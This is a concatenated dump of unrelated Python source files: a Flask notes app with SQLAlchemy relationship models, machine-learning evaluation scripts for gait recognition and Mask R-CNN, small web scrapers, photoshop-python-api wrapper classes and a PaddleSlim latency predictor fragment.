notes = Note.query.all()
return render_template('index.html', notes=notes, form=form)
@app.route('/new', methods=['GET', 'POST'])
def new_note():
form = NewNoteForm()
if form.validate_on_submit():
body = form.body.data
note = Note(body=body)
db.session.add(note)
db.session.commit()
flash('Your note is saved.')
return redirect(url_for('index'))
return render_template('new_note.html', form=form)
@app.route('/edit/<int:note_id>', methods=['GET', 'POST'])
def edit_note(note_id):
form = EditNoteForm()
note = Note.query.get(note_id)
if form.validate_on_submit():
note.body = form.body.data
db.session.commit()
flash('Your note is updated.')
return redirect(url_for('index'))
form.body.data = note.body # preset form input's value
return render_template('edit_note.html', form=form)
@app.route('/delete/<int:note_id>', methods=['POST'])
def delete_note(note_id):
form = DeleteNoteForm()
if form.validate_on_submit():
note = Note.query.get(note_id)
db.session.delete(note)
db.session.commit()
flash('Your note is deleted.')
else:
abort(400)
return redirect(url_for('index'))
# one to many
class Author(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), unique=True)
phone = db.Column(db.String(20))
articles = db.relationship('Article') # collection
def __repr__(self):
return '<Author %r>' % self.name
class Article(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50), index=True)
body = db.Column(db.Text)
author_id = db.Column(db.Integer, db.ForeignKey('author.id'))
def __repr__(self):
return '<Article %r>' % self.title
# many to one
class Citizen(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
city_id = db.Column(db.Integer, db.ForeignKey('city.id'))
city = db.relationship('City') # scalar
def __repr__(self):
return '<Citizen %r>' % self.name
class City(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
def __repr__(self):
return '<City %r>' % self.name
# one to one
class Country(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
capital = db.relationship('Capital', uselist=False) # collection -> scalar
def __repr__(self):
return '<Country %r>' % self.name
class Capital(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
country_id = db.Column(db.Integer, db.ForeignKey('country.id'))
country = db.relationship('Country') # scalar
def __repr__(self):
return '<Capital %r>' % self.name
# many to many with association table
association_table = db.Table('association',
db.Column('student_id', db.Integer, db.ForeignKey('student.id')),
db.Column('teacher_id', db.Integer, db.ForeignKey('teacher.id'))
)
class Student(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
grade = db.Column(db.String(20))
teachers = db.relationship('Teacher',
secondary=association_table,
back_populates='students') # collection
def __repr__(self):
return '<Student %r>' % self.name
class Teacher(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
office = db.Column(db.String(20))
students = db.relationship('Student',
secondary=association_table,
back_populates='teachers') # collection
def __repr__(self):
return '<Teacher %r>' % self.name
# one to many + bidirectional relationship
class Writer(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
books = db.relationship('Book', back_populates='writer')
def __repr__(self):
return '<Writer %r>' % self.name
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), index=True)
writer_id = db.Column(db.Integer, db.ForeignKey('writer.id'))
writer = db.relationship('Writer', back_populates='books')
def __repr__(self):
return '<Book %r>' % self.name
# one to many + bidirectional relationship + use backref to declare bidirectional relationship
class Singer(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
songs = db.relationship('Song', backref='singer')
def __repr__(self):
return '<Singer %r>' % self.name
class Song(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), index=True)
singer_id = db.Column(db.Integer, db.ForeignKey('singer.id'))
def __repr__(self):
return '<Song %r>' % self.name
# cascade
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50))
body = db.Column(db.Text)
comments = db.relationship('Comment', back_populates='post', cascade='all, delete-orphan') # collection
class Comment(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
post_id = db.Column(db.Integer, db.ForeignKey('post.id'))
post = db.relationship('Post', back_populates='comments') # scalar
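# Note: because Post.comments is configured with cascade='all, delete-orphan', deleting a Post
# via db.session.delete(post) also deletes its Comment rows, and a Comment removed from
# post.comments becomes an orphan and is deleted at the next flush/commit.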
# event listening
class Draft(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
edit_time = db.Column(db.Integer, default=0)
@db.event.listens_for(Draft.body, 'set')
def increment_edit_time(target, value, oldvalue, initiator):
if target.edit_time is not None:
target.edit_time += 1
# same with:
# @db.event.listens_for(Draft.body, 'set', named=True)
# def increment_edit_time(**kwargs):
# if kwargs['target'].edit_time is not None:
# kwargs['target'].edit_time += 1
``` |
{
"source": "136823xuewei/gait-recognition",
"score": 2
} |
#### File: gait-recognition/classification/casiab_performance.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from matplotlib import pyplot as plt
import tensorflow as tf
import seaborn as sb
import pandas as pd
import numpy as np
import math
import time
import cv2
import os
tf.reset_default_graph()
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.85)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
# tip: if you run into problems with TensorBoard
# clear the contents of this directory, re-run this script
# then restart TensorBoard to see the result
# LOGDIR = './graphs'
model_frames = 64
NUM_CLASSES = 74
NUM_PIXELS = 88 * 128
TRAIN_STEPS = 0
BATCH_SIZE = 1 << 5
MODEL_ANGLE_DICT = {'000': True, '018': False, '036': False, '054': False, '072': False, '090': False, '108': False, '126': False, '144': False, '162': False, '180': False}
TEST_ANGLE_DICT = {'000': False, '018': False, '036': False, '054': True, '072': False, '090': False, '108': False, '126': False, '144': False, '162': False, '180': False}
LEARNING_RATE = 1e-4
DATA_PATH = 'Generated_full_data_GEI'
start_time = time.time()
keep_prob = 0.5 #dropout (keep probability)
def del_files(path):
for root, dirs, files in os.walk(path):
for name in files:
if name.startswith("."):
os.remove(os.path.join(root, name))
print("Delete File: " + os.path.join(root, name))
def get_label(_index, num_classes):
# label = np.zeros(shape=[num_classes], dtype='float32')
# label[int(_index) - 1] = 1
# return label
return (int(_index) - 1)
def load_images_from_folder(folder, model_angle_dict, test_angle_dict):
train_frames = []
train_labels = []
probe_frames = []
probe_labels = []
for i in xrange(11):
train_frames.append([])
for i in xrange(11):
train_labels.append([])
for i in xrange(11):
probe_frames.append([])
for i in xrange(11):
probe_labels.append([])
for human_id in os.listdir(os.path.join(folder, 'train')):
if int(human_id) < 74:
continue
for angle in os.listdir(os.path.join(folder, 'train', human_id)):
# if not model_angle_dict[angle]:
# continue
for _type in os.listdir(os.path.join(folder, 'train', human_id, angle)):
img = cv2.imread(os.path.join(folder, 'train', human_id, angle, _type), 0)
if img is not None:
train_frames[int(angle) // 18].append(img.flatten())
train_labels[int(angle) // 18].append(get_label(human_id, 124))
for human_id in os.listdir(os.path.join(folder, 'test')):
for angle in os.listdir(os.path.join(folder, 'test', human_id)):
# if not test_angle_dict[angle]:
# continue
for _type in os.listdir(os.path.join(folder, 'test', human_id, angle)):
img = cv2.imread(os.path.join(folder, 'test', human_id, angle, _type), 0)
if img is not None:
probe_frames[int(angle) // 18].append(img.flatten())
probe_labels[int(angle) // 18].append(get_label(human_id, 124))
return (train_frames, train_labels, probe_frames, probe_labels)
del_files(DATA_PATH)
(train_frames, train_labels, probe_frames, probe_labels) = load_images_from_folder(DATA_PATH, MODEL_ANGLE_DICT, TEST_ANGLE_DICT)
# Define inputs
with tf.name_scope('input'):
images = tf.placeholder(tf.float32, [None, NUM_PIXELS], name="pixels")
labels = tf.placeholder(tf.float32, [None, NUM_CLASSES], name="labels")
# dropout_prob = tf.placeholder_with_default(1.0, shape=())
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, 2, 2, 1],
padding='SAME')
# Create model
def conv_net(x, weights, biases, dropout):
# Reshape input picture
x = tf.reshape(x, shape=[-1, 128, 88, 1])
# Convolution Layer
conv1 = conv2d(x, weights['wc1'], biases['bc1'])
# Max Pooling (down-sampling)
conv1 = maxpool2d(conv1, k=2)
conv1 = tf.contrib.layers.batch_norm(conv1)
# Convolution Layer
conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])
# Max Pooling (down-sampling)
conv2 = maxpool2d(conv2, k=3)
conv2 = tf.contrib.layers.batch_norm(conv2)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc3 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc3 = tf.add(tf.matmul(fc3, weights['wd1']), biases['bd1'])
fc3 = tf.nn.relu(fc3)
# Apply Dropout
# fc1 = tf.nn.dropout(fc1, dropout)
# fc3 = tf.nn.dropout(fc3, dropout_prob)
# # Output, class prediction
fc4 = tf.add(tf.matmul(fc3, weights['fc4']), biases['fc4'])
return fc3
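# Note: conv_net returns the 1024-d fully connected embedding fc3 (not the fc4 class logits),
# so the restored network is used below as a feature encoder for gallery/probe matching.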
# Store layers weight & bias
initializer = tf.contrib.layers.xavier_initializer()
weights = {
# 7x7 conv, 1 input, 18 outputs
'wc1': tf.Variable(initializer([7, 7, 1, 18])),
# 5x5 conv, 18 inputs, 45 outputs
'wc2': tf.Variable(initializer([5, 5, 18, 45])),
# fully connected, 7*7*64 inputs, 1024 outputs
'wd1': tf.Variable(initializer([32*22*45, 1024])),
# # 1024 inputs, 10 outputs (class prediction)
'fc4': tf.Variable(initializer([1024, NUM_CLASSES]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([18])),
'bc2': tf.Variable(tf.random_normal([45])),
'bd1': tf.Variable(tf.random_normal([1024])),
'fc4': tf.Variable(tf.random_normal([NUM_CLASSES]))
}
y = conv_net(images, weights, biases, keep_prob)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
saver.restore(sess, "./full_tri_model/model.ckpt")
print("%d frames model restored."%model_frames)
print(' ', end=',')
for i in xrange(11):
print('%4d'%(i * 18), end=',')
print_map = np.zeros(shape=(11, 11), dtype=np.float32)
gallery_encoding = []
probe_encoding = []
for a in range(11):
gallery_encoding.append(sess.run(y, feed_dict={images: train_frames[a]}))
for a in range(11):
probe_encoding.append(sess.run(y, feed_dict={images: probe_frames[a]}))
for a in range(11):
print('')
print('%3d'%(a * 18), end=',')
for b in range(11):
simlarity = np.zeros(shape=[len(probe_encoding[b]), len(gallery_encoding[a])], dtype=np.float32)
pred_label = np.zeros(shape=[len(probe_encoding[b])], dtype=np.int)
for i in range(len(probe_encoding[b])):
for j in range(len(gallery_encoding[a])):
simlarity[i][j] = np.exp(-(((probe_encoding[b][i] - gallery_encoding[a][j])/1024.0)**2).sum())
# import pdb
# pdb.set_trace()
tmp_index = simlarity[i].argmax()
pred_label[i] = train_labels[a][tmp_index]
# if not (pred_label[i] == probe_labels[i]):
# print(str((pred_label[i] == probe_labels[i])) + ' ' + str(pred_label[i]) + ' ' + str(probe_labels[i]))
acc = np.sum(pred_label[:] == probe_labels[b][:])
# print_map[b][10 - a] = 100.0 * acc/(len(probe_labels[b])*1.0)
print_map[b][a] = 100.0 * acc/(len(probe_labels[b])*1.0)
print('%.2f'%(100.0 * acc/(len(probe_labels[b])*1.0)), end=',')
print(print_map)
grid_visualization = np.array(print_map.transpose())
grid_visualization.shape = (11, 11)
sb.heatmap(grid_visualization, cmap='Oranges')
plt.xticks(np.arange(11) + 0.5, xrange(0, 181, 18))
plt.yticks(np.arange(11) + 0.5, xrange(180, -1, -18))
plt.xlabel('Gallery Angle')
plt.ylabel('Probe Angle')
plt.show()
``` |
{
"source": "136s/check_pharmacist",
"score": 3
} |
#### File: 136s/check_pharmacist/check_pharmacist.py
```python
import time
import pandas as pd
from selenium import webdriver
SEARCH_URL = "https://licenseif.mhlw.go.jp/search_iyaku/top.jsp"
SLEEP_SEC = 3
IN_CSV_NAME = "./list.csv"
OUT_CSV_NAME = "./output.csv"
# Given a name, return a list of registration years
def get_years(name):
driver.get(SEARCH_URL)
time.sleep(SLEEP_SEC)
search_box = driver.find_element_by_name("name")
search_box.send_keys(name)
search_box.submit()
regi = driver.find_elements_by_class_name('REGISTRATION_TD')
years = []
for r in regi:
years.append(r.text)
return years
# The CSV has name and years columns (with a header row)
df = pd.read_csv(IN_CSV_NAME)
df["years"] = df["years"].astype(str)
driver = webdriver.Chrome()
for i, _ in df.iterrows():
result = get_years(df.at[i, "name"])
df.at[i, "years"] = " ".join(result) # スペース区切りで格納
driver.quit()
df.to_csv(open(OUT_CSV_NAME, "w", encoding="utf_8_sig", newline=""), index=False)
``` |
{
"source": "1371164370/IC3Net",
"score": 3
} |
#### File: IC3Net/web/json_process.py
```python
import os
import json
import sys
SIMPLE_SPREAD=0
TRAFFIC_JUNCTION=1
# Walk a directory tree and collect every file under it
class AllFile:
def __init__(self,path) -> None:
self.path=path
def get_file_list(self):
file_list =[]
self.__file_in_dir_iter(self.path,file_list)
return file_list
def __file_in_dir_iter(self,path,file_list):
for name in os.listdir(path):
p = os.path.join(path, name)
if os.path.isfile(p):
file_list.append(p)
else:
self.__file_in_dir_iter(p,file_list)
def refresh_param(game,key,value):
'''
example -- refresh_param(SIMPLE_SPREAD,"--load",AllFile("models").get_file_list())
    key -- parameter name
    value -- a list of values
'''
with open('./web/static/source/data/game_param.json') as f:
data=json.load(f)
with open('./web/static/source/data/game_param.json','w') as f:
data["games"][game]["params"][key]=value
json.dump(data,f,indent=4)
``` |
{
"source": "1371174718/Mask_RCNN_master",
"score": 3
} |
#### File: compute_map/shapes/compute_map.py
```python
from shapes import *
import numpy as np
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
from mrcnn.model import log
# %matplotlib inline
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# %%
class BalloonConfig(Config):
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
# Give the configuration a recognizable name
NAME = "version"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # Background + balloon
# Number of training steps per epoch
STEPS_PER_EPOCH = 1
VALIDATION_STEPS = 1
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 640
config = BalloonConfig()
config.display()
# %%
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))
return ax
def data_split(full_list, ratio, shuffle=False):
n_total = len(full_list)
offset = int(n_total * ratio)
if n_total == 0 or offset < 1:
return [], full_list
if shuffle:
random.shuffle(full_list)
sublist_1 = full_list[:offset]
sublist_2 = full_list[offset:]
return sublist_1, sublist_2
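# For example, with shuffle=False: data_split([1, 2, 3, 4, 5], ratio=0.2) returns ([1], [2, 3, 4, 5]),
# mirroring how the validation/train json file lists are split below.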
from pathlib import Path
config = BalloonConfig()
dataset_root_path = r'E:\GitHub_Projects\Mask_RCNN_master\samples\compute_map\saveImgFiles'
# dataset_root_path = r'D:\宜昌\zhiwei_3D\tuyang_json_img'
# os.path.join(ROOT_DIR, "train_data\\train_1")
path = Path(dataset_root_path)
all_json_file = list(path.glob('**/*.json'))
val_json_file, train_json_file = data_split(all_json_file, ratio=0.2, shuffle=True)
train_count = len(train_json_file)
val_count = len(val_json_file)
# Training dataset.
dataset_train = BalloonDataset()
dataset_train.load_balloon(dataset_root_path, train_json_file)
dataset_train.prepare()
# Validation dataset
dataset_val = BalloonDataset()
dataset_val.load_balloon(dataset_root_path, val_json_file)
dataset_val.prepare()
## Detection
# %%
class InferenceConfig(BalloonConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
model_path = r"E:\GitHub_Projects\Mask_RCNN_master\logs\mask_rcnn_balloon_0030.h5"
# model_path = r"D:\宜昌\zhiwei_3D\tuyang_json_img\mask_rcnn_balloon_0030.h5"
# model_path = model.find_last()
# Load trained weights
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
# %%
# Test on a random image
image_id = random.choice(dataset_val.image_ids)
original_image, image_meta, gt_class_id, gt_bbox, gt_mask = \
modellib.load_image_gt(dataset_val, inference_config,
image_id, use_mini_mask=False)
log("original_image", original_image)
log("image_meta", image_meta)
log("gt_class_id", gt_class_id)
log("gt_bbox", gt_bbox)
log("gt_mask", gt_mask)
visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id,
dataset_train.class_names, figsize=(8, 8))
# %%
results = model.detect([original_image], verbose=1)
r = results[0]
visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'],
dataset_val.class_names, r['scores'], ax=get_ax())
# %% md
## Evaluation
# %%
# Compute VOC-Style mAP @ IoU=0.5
# Running on 10 images. Increase for better accuracy.
image_ids = np.random.choice(dataset_val.image_ids, 10)
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask = \
modellib.load_image_gt(dataset_val, inference_config,
image_id, use_mini_mask=False)
molded_images = np.expand_dims(modellib.mold_image(image, inference_config), 0)
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps = \
utils.compute_ap(gt_bbox, gt_class_id, gt_mask,
r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
``` |
{
"source": "1372143376/python27",
"score": 3
} |
#### File: python27/image/imgs.py
```python
import re
import urllib
import urllib2
import os
def getHtml(url):
page=urllib.urlopen(url)
html=page.read()
return html
def getImg(html):
reg=r'"objURL":"(.*?)"'
imgre=re.compile(reg)
imglist=re.findall(imgre,html)
print imgre
l=len(imglist)
print l
return imglist
def downLoad(urls,path):
index=1
for url in urls:
print("downind",url)
filename=os.path.join(path,str(index)+".jpg")
urllib.urlretrieve(url,filename)
index+=1
html=getHtml("https://image.baidu.com/search/index?ct=201326592&cl=2&st=-1&lm=-1&nc=1&ie=utf-8&tn=baiduimage&ipn=r&rps=1&pv=&fm=rs2&word=%E8%B6%85%E7%BA%A7%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87%E7%AC%91%E6%AD%BB%E4%BA%BA&oriquery=%E6%9C%80%E8%BF%91%E5%BE%88%E7%81%AB%E7%9A%84%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87&ofr=%E6%9C%80%E8%BF%91%E5%BE%88%E7%81%AB%E7%9A%84%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87&hs=2")
Savepath="D:\soft\python27\image\imgs"
downLoad(getImg(html),Savepath)
```
#### File: setuptools/tests/test_develop.py
```python
import sys
import os, shutil, tempfile, unittest
import site
from StringIO import StringIO
from distutils.errors import DistutilsError
from setuptools.command.develop import develop
from setuptools.command import easy_install as easy_install_pkg
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo')
"""
class TestDevelopTest(unittest.TestCase):
def setUp(self):
self.dir = tempfile.mkdtemp()
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'w')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
os.chdir(self.dir)
if sys.version >= "2.6":
self.old_base = site.USER_BASE
site.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
if sys.version >= "2.6":
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_develop(self):
if sys.version < "2.6":
return
dist = Distribution()
dist.script_name = 'setup.py'
cmd = develop(dist)
cmd.user = 1
cmd.ensure_finalized()
cmd.install_dir = site.USER_SITE
cmd.user = 1
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
cmd.run()
finally:
sys.stdout = old_stdout
# let's see if we got our egg link at the right place
content = os.listdir(site.USER_SITE)
content.sort()
self.assertEquals(content, ['UNKNOWN.egg-link', 'easy-install.pth'])
def test_develop_with_setup_requires(self):
wanted = ("Could not find suitable distribution for "
"Requirement.parse('I-DONT-EXIST')")
old_dir = os.getcwd()
os.chdir(self.dir)
try:
try:
dist = Distribution({'setup_requires': ['I_DONT_EXIST']})
except DistutilsError, e:
error = str(e)
if error == wanted:
pass
finally:
os.chdir(old_dir)
``` |
{
"source": "13751742405/photoshop-python-api",
"score": 3
} |
#### File: photoshop-python-api/examples/_psd_files.py
```python
import os
def get_psd_files():
files = {}
this_root = os.path.dirname(__file__)
file_root = os.path.join(this_root, "files")
for file_name in os.listdir(file_root):
files[file_name] = os.path.join(file_root, file_name)
return files
```
#### File: photoshop/api/action_reference.py
```python
from ._core import Photoshop
from .enumerations import ReferenceFormType
class ActionReference(Photoshop):
object_name = "ActionReference"
def __init__(self, parent=None):
super().__init__(parent=parent)
def getContainer(self):
return self.app.getContainer()
def getDesiredClass(self):
return self.app.getDesiredClass()
def getEnumeratedType(self) -> int:
return self.app.getEnumeratedType()
def getEnumeratedValue(self) -> int:
return self.app.getEnumeratedValue()
def getForm(self) -> ReferenceFormType:
"""Gets the form of this action reference."""
return ReferenceFormType(self.app.getForm())
def getIdentifier(self) -> int:
"""Gets the identifier value for a reference whose form is
identifier."""
return self.app.getIdentifier()
def getIndex(self) -> int:
"""Gets the index value for a reference in a list or array,"""
return self.app.getIndex()
def putName(self, key, value):
return self.app.putName(key, value)
def putClass(self, value):
return self.app.putClass(value)
def putEnumerated(self, desired_class, enum_type, value):
"""Puts an enumeration type and ID into a reference along with the
desired class for the reference."""
return self.app.putEnumerated(desired_class, enum_type, value)
def putIdentifier(self, desired_class, value):
return self.app.putIdentifier(desired_class, value)
def putIndex(self, desired_class, value):
return self.app.putIndex(desired_class, value)
def putOffset(self, desired_class, value):
return self.app.putOffset(desired_class, value)
def putProperty(self, desired_class, value):
return self.app.putProperty(desired_class, value)
```
#### File: photoshop/api/_documentinfo.py
```python
from pprint import pformat
# Import local modules
from ._core import Photoshop
# pylint: disable=too-many-public-methods
class DocumentInfo(Photoshop):
"""Metadata about a document object."""
def __init__(self, parent):
super().__init__(parent=parent)
def __str__(self):
return pformat(
{
"author": self.author,
"authorPosition": self.authorPosition,
"caption": self.caption,
"captionWriter": self.captionWriter,
"category": self.category,
"city": self.city,
"country": self.country,
"copyrightNotice": self.copyrightNotice,
"copyrighted": self.copyrighted,
"creationDate": self.creationDate,
"credit": self.credit,
"exif": self.exif,
"headline": self.headline,
"instructions": self.instructions,
"jobName": self.jobName,
"keywords": self.keywords,
"provinceState": self.provinceState,
"source": self.source,
"ownerUrl": self.ownerUrl,
"supplementalCategories": self.supplementalCategories,
"title": self.title,
"transmissionReference": self.transmissionReference,
"urgency": self.urgency,
}
)
@property
def author(self):
"""str: The author."""
return self.app.author
@author.setter
def author(self, name):
self.app.author = name
@property
def authorPosition(self):
"""str:The author’s position."""
return self.app.authorPosition
@authorPosition.setter
def authorPosition(self, name):
self.app.authorPosition = name
@property
def caption(self):
return self.app.caption
@caption.setter
def caption(self, name):
self.app.caption = name
@property
def captionWriter(self):
return self.app.captionWriter
@captionWriter.setter
def captionWriter(self, name):
self.app.captionWriter = name
@property
def category(self):
"""str: The document category."""
return self.app.category
@category.setter
def category(self, name):
self.app.category = name
@property
def city(self):
return self.app.city
@city.setter
def city(self, city_name):
self.app.city = city_name
@property
def copyrightNotice(self):
"""str: The copyright notice."""
return self.app.copyrightNotice
@copyrightNotice.setter
def copyrightNotice(self, name):
self.app.copyrightNotice = name
@property
def copyrighted(self):
"""str: The copyright status."""
return self.app.copyrighted
@copyrighted.setter
def copyrighted(self, info):
self.app.copyrighted = info
@property
def country(self):
return self.app.country
@country.setter
def country(self, name):
self.app.country = name
@property
def creationDate(self):
return self.app.creationDate
@creationDate.setter
def creationDate(self, name):
self.app.creationDate = name
@property
def credit(self):
"""str: The author credit."""
return self.app.credit
@credit.setter
def credit(self, value):
self.app.credit = value
@property
def exif(self):
return self.app.exif
@exif.setter
def exif(self, info):
self.app.exif = info
@property
def headline(self):
return self.app.headline
@headline.setter
def headline(self, value):
self.app.headline = value
@property
def instructions(self):
return self.app.instructions
@instructions.setter
def instructions(self, value):
self.app.instructions = value
@property
def jobName(self):
return self.app.jobName
@jobName.setter
def jobName(self, job):
self.app.jobName = job
@property
def keywords(self):
return self.app.keywords
@keywords.setter
def keywords(self, words):
self.app.keywords = words
@property
def ownerUrl(self):
return self.app.ownerUrl
@ownerUrl.setter
def ownerUrl(self, url):
self.app.ownerUrl = url
@property
def provinceState(self):
"""str: The state or province."""
return self.app.provinceState
@provinceState.setter
def provinceState(self, state_name):
self.app.provinceState = state_name
@property
def source(self):
return self.app.source
@source.setter
def source(self, source_name):
self.app.source = source_name
@property
def supplementalCategories(self):
"""str: Other categories."""
return self.app.supplementalCategories
@supplementalCategories.setter
def supplementalCategories(self, info):
self.app.supplementalCategories = info
@property
def title(self):
return self.app.title
@title.setter
def title(self, name):
self.app.title = name
@property
def transmissionReference(self):
"""str: The transmission reference."""
return self.app.transmissionReference
@transmissionReference.setter
def transmissionReference(self, reference):
self.app.transmissionReference = reference
@property
def urgency(self):
"""The document urgency."""
return self.app.urgency
@urgency.setter
def urgency(self, status):
self.app.urgency = status
```
#### File: api/open_options/eps.py
```python
from .._core import Photoshop
class EPSOpenOptions(Photoshop):
"""Options for saving a document in EPS format.
using the `Document.saveAs()`
"""
object_name = "EPSOpenOptions"
def __init__(self):
super().__init__()
@property
def antiAlias(self):
return self.app.antiAlias
@property
def constrainProportions(self):
return self.app.constrainProportions
@property
def height(self):
return self.app.height
@property
def mode(self):
return self.app.mode
@property
def resolution(self):
return self.app.resolution
@property
def width(self):
return self.app.width
@property
def embedColorProfile(self):
return self.app.embedColorProfile
@embedColorProfile.setter
def embedColorProfile(self, boolean):
self.app.embedColorProfile = boolean
```
#### File: photoshop/api/solid_color.py
```python
from ._core import Photoshop
from .colors.cmyk import CMYKColor
from .colors.gray import GrayColor
from .colors.hsb import HSBColor
from .colors.lab import LabColor
from .colors.rgb import RGBColor
from .enumerations import ColorModel
class SolidColor(Photoshop):
object_name = "SolidColor"
def __init__(self, parent=None):
super().__init__(parent=parent)
@property
def cmyk(self) -> CMYKColor:
"""The CMYK color mode.
Returns:
.colors.cmyk.CMYKColor:
"""
return CMYKColor(self.app.cmyk)
@cmyk.setter
def cmyk(self, value: CMYKColor):
self.app.cmyk = value
@property
def gray(self) -> GrayColor:
return GrayColor(self.app.gray)
@property
def hsb(self) -> HSBColor:
return HSBColor(self.app.hsb)
@hsb.setter
def hsb(self, value: HSBColor):
self.app.hsb = value
@property
def lab(self) -> LabColor:
return LabColor(self.app.lab)
@lab.setter
def lab(self, value: LabColor):
self.app.lab = value
@property
def model(self) -> ColorModel:
"""The color model."""
return ColorModel(self.app.model)
@model.setter
def model(self, value: ColorModel):
"""The color model."""
self.app.model = value
@property
def nearestWebColor(self) -> RGBColor:
"""The nearest web color to the current color."""
return RGBColor(self.app.NearestWebColor)
@property
def rgb(self) -> RGBColor:
"""The RGB color mode."""
return RGBColor(self.app.rgb)
@rgb.setter
def rgb(self, value: RGBColor):
self.app.rgb = value
def isEqual(self, color: RGBColor):
"""`SolidColor` object is visually equal to the specified color."""
return self.app.isEqual(color)
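# A minimal usage sketch, assuming the red/green/blue attributes exposed by the companion
# RGBColor wrapper and an existing Application instance named `app` (both are assumptions,
# not part of this module):
#
#   color = SolidColor()
#   color.rgb.red = 255
#   color.rgb.green = 0
#   color.rgb.blue = 0
#   app.foregroundColor = color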
``` |
{
"source": "1375207619/PaddleSlim",
"score": 3
} |
#### File: paddleslim/analysis/latency_predictor.py
```python
import os
import pickle
import shutil
import subprocess
from .parse_ops import get_key_from_op
from .extract_features import get_data_from_tables, get_features_from_paramkey
from ._utils import opt_model, load_predictor, nearest_interpolate
import paddle
import paddleslim
import warnings
__all__ = ["LatencyPredictor", "TableLatencyPredictor"]
def format_Warning(message, category, filename, lineno, line=''):
return str(filename) + ':' + str(
lineno) + ': ' + category.__name__ + ': ' + str(message) + '\n'
warnings.formatwarning = format_Warning
class LatencyPredictor(object):
"""Base class of latency predictor.
"""
def predict_latency(self, model):
"""Get latency of model. It is an abstract method.
Args:
model: The model to be evaluated.
Returns:
latency(float): The latency of given model on current evaluator.
"""
raise NotImplementedError('Abstract method.')
def _get_key_info_from_graph(self, graph):
graph_keys = []
for op in graph.ops():
param_key = get_key_from_op(op)
graph_keys.append(param_key)
return graph_keys
class TableLatencyPredictor(LatencyPredictor):
"""The preditor used to get pbmodel's latency on some devices and infer engines.
Args:
table_file(str): The path of file that records the device latency of operators.
"""
def __init__(self, table_file='SD710'):
self.table_file = table_file
self.table_dict = {}
self.hardware = None
self.threads = None
self.predictor_state = False
self.predictor = {}
self._initial_table()
def _initial_table(self):
if self.table_file in ['SD625', 'SD710', 'SD845', 'SD865']:
self.hardware = self.table_file
self.threads = 4
